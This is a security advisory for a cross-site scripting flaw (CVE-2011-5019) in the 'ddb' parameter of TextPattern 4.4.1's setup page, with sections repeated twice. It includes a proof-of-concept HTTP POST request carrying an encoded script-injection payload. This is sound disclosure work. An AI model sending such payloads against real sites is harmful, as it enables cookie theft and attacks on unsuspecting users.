TextPattern 'ddb' Parameter Cross Site Scripting Vulnerability
BID:51254
Info
TextPattern 'ddb' Parameter Cross Site Scripting Vulnerability
| Bugtraq ID: | 51254 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-5019 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 04 2012 12:00AM |
| Updated: | Jan 04 2012 12:00AM |
| Credit: | Jonathan Claudius of Trustwave SpiderLabs |
| Vulnerable: |
TextPattern TextPattern 4.4.1 |
| Not Vulnerable: | |
Discussion
TextPattern 'ddb' Parameter Cross Site Scripting Vulnerability
TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TextPattern 4.4.1 is vulnerable; other versions may also be affected.
TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TextPattern 4.4.1 is vulnerable; other versions may also be affected.
Exploit / POC
TextPattern 'ddb' Parameter Cross Site Scripting Vulnerability
To exploit the issue, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example data is available:
POST /textpattern/setup/index.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://www.example.com/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config
To exploit the issue, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example data is available:
POST /textpattern/setup/index.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://www.example.com/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
duser=blah&dpass=&dhost=localhost&ddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
Fscript%3E&dprefix=&siteurl=A.B.C.D&Submit=next&lang=en-us&step=print
Config
Solution / Fix
TextPattern 'ddb' Parameter Cross Site Scripting Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
TextPattern 'ddb' Parameter Cross Site Scripting Vulnerability
References:
References:
- Textpattern Homepage (Textpattern CMS)